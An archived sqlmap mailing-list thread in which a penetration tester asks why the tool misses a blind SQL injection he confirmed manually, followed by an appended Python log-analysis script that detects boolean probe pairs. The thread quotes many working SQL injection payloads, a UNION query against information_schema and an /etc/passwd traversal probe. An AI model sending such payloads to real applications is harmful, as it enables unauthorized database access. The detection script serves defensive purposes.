OK. You're right in that the following lines in your dummy output should produce discernible responses when tested against the application:

PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd

I've verified this manually. Thanks and I'll send you the traffic output file.

Cheers,

Alistair.

On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
> I would say that you screwed something up. Can you please send that traffic
> file I requested.
>
> Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> invalid.
>
> $ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection --dummy -v 3
>
>          _
>  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|             |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability and
> are not responsible for any misuse or damage caused by this program
>
> [*] starting at 08:55:05
>
> [08:55:05] [DEBUG] cleaning up configuration parameters
> [08:55:05] [DEBUG] setting the HTTP timeout
> [08:55:05] [DEBUG] creating HTTP requests opener object
> [08:55:05] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
> [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> [08:55:05] [INFO] testing if the target URL is stable. This can take a couple of seconds
> [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to retry the request
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 2485
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 8682
> [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec' might not be injectable
> [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> ...
>
> On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amcljohn...@gmail.com> wrote:
>>
>> Hi Brandon,
>>
>> Thanks for your comment. Confirming that I've tried risk=3 with
>> level=5 with the same results. I've looked more closely at the
>> requests that sqlmap is sending to check if the parameter is
>> injectable. It is testing the Sec parameter with values such as:
>>
>> PackageSelection) AND 1477=7114
>> PackageSelection) AND 1631=1631
>> PackageSelection') AND 5603=7729
>> PackageSelection') AND 1631=1631
>> PackageSelection' AND 3943=9381
>> PackageSelection' AND 1631=1631
>> PackageSelection" AND 3324=4690
>> PackageSelection" AND 1631=1631
>> PackageSelection) AND 4734=6616 AND (6346=6346
>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>
>> When in fact, I assume it would need to use logic like I used to get
>> distinguishable responses:
>>
>> PackageSelection (returns response A)
>> PackageSelection' AND '1'='1 (returns response A)
>> PackageSelection' AND '1'='2 (returns response B)
>>
>> In a nutshell, it doesn't appear to be trying single quotes and values
>> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
>> typical format for checking boolean-based blind SQLi.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry <bperry.volat...@gmail.com> wrote:
>>> It's a GET, so there wouldn't be a content type, unless I am mistaken.
>>>
>>> Alistair, have you tried --risk=3 with --level=5 yet?
>>>
>>> Sent from a phone
>>>
>>> On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>>>
>>> Can you please send the unredacted content of request.txt to my address?
>>>
>>> If not, then please at least send me the content of traffic file which you
>>> can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
>>> run.
>>>
>>> Bye
>>>
>>> On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amcljohn...@gmail.com> wrote:
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> The contents of the request file are as follows:
>>>>
>>>> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>>>> Host: <redacted>
>>>> Accept: */*
>>>> Accept-Language: en
>>>> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
>>>> Connection: close
>>>> Referer: <redacted>
>>>> Cookie: <redacted>
>>>>
>>>> I've redacted some of the details as it's not appropriate to draw
>>>> attention to an internet facing application's SQLi vulnerability.
>>>>
>>>> When providing the request file as part of the following command:
>>>>
>>>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>>>>
>>>> sqlmap executes as normal but cannot identify (and therefore cannot
>>>> exploit) the boolean-based blind vulnerability which I've verified
>>>> manually.
>>>>
>>>> Thanks again,
>>>>
>>>> Al.
>>>>
>>>>
>>>> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>>>>> And what is the content of request file?
>>>>>
>>>>> Bye
>>>>>
>>>>> On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amcljohn...@gmail.com> wrote:
>>>>>>
>>>>>> Hi sqlmappers,
>>>>>>
>>>>>> I'm a fairly experienced user of sqlmap having used it extensively in
>>>>>> the past. I came across what appeared to be pretty typical boolean-based
>>>>>> blind SQLi in an application I'm (legally) testing. However, for the
>>>>>> first time, I'm unable to get sqlmap to recognise the parameter as
>>>>>> vulnerable to exploit it further. And as we know, manually exploiting
>>>>>> blind SQLi is cumbersome to say the least.
>>>>>>
>>>>>> Here is a summary of the requests I've made to manually confirm the
>>>>>> vulnerability.
>>>>>>
>>>>>> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>>>>>> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
>>>>>> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
>>>>>>
>>>>>> I've tried various sqlmap flags and thought the following command
>>>>>> would give me the best chance of success:
>>>>>>
>>>>>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>>>>>>
>>>>>> Note: the string 'industries' is text that appears in response A but
>>>>>> not response B.
>>>>>>
>>>>>> I've looked at the requests that sqlmap is sending in the background
>>>>>> (proxied through burp). It appears that it's attempting to exploit
>>>>>> this with the AND statement as it should but is not using single
>>>>>> quotes as per my example above.
>>>>>>
>>>>>> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
>>>>>> more than happy to contribute some time to improve it so it can
>>>>>> identify injectable parameters such as these in the future.
>>>>>>
>>>>>> Thanks,
>>>>>>
>>>>>> Al.
>>>>>>
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sqlmap-users@lists.sourceforge.net
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm
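Added here as a defender-side illustration, not part of the thread and not sqlmap code: the probe pair Miroslav points to in the dummy output, a contradiction such as `AND 1595=1103` next to a tautology `AND 1559=1559` against the same parameter (and Alistair's own `' AND '1'='1` / `'1'='2` variant), is also the pattern a log review can key on. The access-log lines, client addresses and timestamps below are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (hypothetical client IPs and timestamps),
# modelled on the probe pair quoted in the thread: a contradiction
# (1595=1103) and a tautology (1559=1559) sent against the same parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Apr/2015:08:55:05 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1" 200 5120
10.0.0.5 - - [29/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%201595%3D1103%20AND%20%27cBLQ%27%3D%27cBLQ HTTP/1.1" 200 3010
10.0.0.5 - - [29/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%201559%3D1559%20AND%20%27uIvd%27%3D%27uIvd HTTP/1.1" 200 5120
10.0.0.9 - - [29/Apr/2015:09:01:00 +0000] "GET /help/UserGuide.aspx?Sec=Billing HTTP/1.1" 200 4800
"""

# "AND <n>=<m>" is the comparison every boolean-based blind probe in the quoted
# output carries, whatever quote prefix/suffix wraps it; optional single quotes
# also cover the hand-built ' AND '1'='1 form from the first message.
PROBE_RE = re.compile(r"\bAND\s+'?(\d+)'?\s*=\s*'?(\d+)", re.IGNORECASE)
# Common Log Format: client address first, request target inside the quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def classify_probe(value):
    """Return 'true' for a tautology (1559=1559), 'false' for a
    contradiction (1595=1103), or None if the value carries no probe."""
    m = PROBE_RE.search(value)
    if not m:
        return None
    return "true" if m.group(1) == m.group(2) else "false"

def find_blind_probe_pairs(log_text):
    """Group decoded query parameters by (client, path, parameter name) and
    report every group that received both a true and a false probe: one
    probe alone may be noise, the pair is the signature of a blind test."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), urlsplit(m.group(2))
        # parse_qsl percent-decodes, so %27 and %3D become ' and = here.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            kind = classify_probe(value)
            if kind:
                seen[(client, target.path, name)].add(kind)
    return sorted(key for key, kinds in seen.items() if kinds == {"true", "false"})

if __name__ == "__main__":
    for client, path, param in find_blind_probe_pairs(SAMPLE_LOG):
        print(f"boolean-blind probe pair from {client} against {path}?{param}")
```

A single request carrying `AND 1559=1559` is a weak signal on its own; pairing the true and false probes per client and parameter is what separates a scan from stray input.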